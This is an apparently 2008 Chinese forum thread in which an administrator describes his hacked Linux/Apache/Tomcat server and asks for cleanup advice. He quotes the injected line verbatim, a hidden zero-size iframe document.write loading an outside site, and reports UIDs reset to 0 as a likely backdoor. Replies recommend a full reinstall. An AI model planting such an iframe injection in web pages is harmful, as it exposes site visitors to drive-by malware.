！求助！linux+apache2+tomcat+mysql被黑，网页被加入css代码

vilevirusvinny

web服务器配置为 linux+apache2+tomcat+mysql，今天发现被黑了，现象为VNC不能连接上，用Sniffer pro软件监测到该服务器IP不断上传数据，网站无法访问。重起机器之后网站恢复，但用客户机访问该网站首页时IE下面显示当前链接的栏中会有XXX w.cao360.com XXX等字样一闪而过（XXX是我没看清楚的部分），同时IE主页上方有个黄条提示安装RealNetwork什么的。看起来是访问我们的网站之前刷新了一遍别人的网站。打开网站文件夹搜索cao360字样发现在 /网站根目录/css/scr.js中被添加了一行代码：
document.write('<iframe height=0 width=0 src="http://w.cao360.com/z7.htm?id=9999"></iframe>');
删除这行代码之后网站恢复正常，但从图形界面进入用户管理界面发现：
games operator 这两个系统默认的用户ID 被修改成0
我自己常用的帐户ID本来应该是500，也被修改成了0
其他问题尚未发现
在路由器系统中的防火器设置中为该服务器开了www telnet pop smtp四个tcp端口，linux服务器自带的防火墙没有启用，没有打补丁，linux版本为 Redhat EL4 AS，root帐户和我自己的帐户都设置有强密码

请各位高手帮我看看，是哪个环节出了问题，该如何避免黑客再次修改网站，还有如何恢复已经被修改的用户ID，不胜感激！！！

[ 本帖最后由 vilevirusvinny 于 2008-5-13 10:05 编辑 ]

vermouth

这家伙似乎没擦pp，
/dev/shm/".      " 似乎就是遗留问题。

vilevirusvinny

请高手帮忙指点一下，黑客为什么要修改那几个用户的UID，是什么用意？我是直接把UID改回来吗？因为服务器上有网站和邮件系统，全是手工编译安装的，重装一次非常麻烦。该怎么做善后操作？先谢谢各位了

swordfish.cn

原帖由 vilevirusvinny 于 2008-5-16 10:17 发表
请高手帮忙指点一下，黑客为什么要修改那几个用户的UID，是什么用意？我是直接把UID改回来吗？因为服务器上有网站和邮件系统，全是手工编译安装的，重装一次非常麻烦。该怎么做善后操作？先谢谢各位了

我认为要想完全修复那才是非常麻烦。很有可能你的机器上已经有后门什么的了。
而且你根本就不清楚漏洞在哪。还是直接重装为好。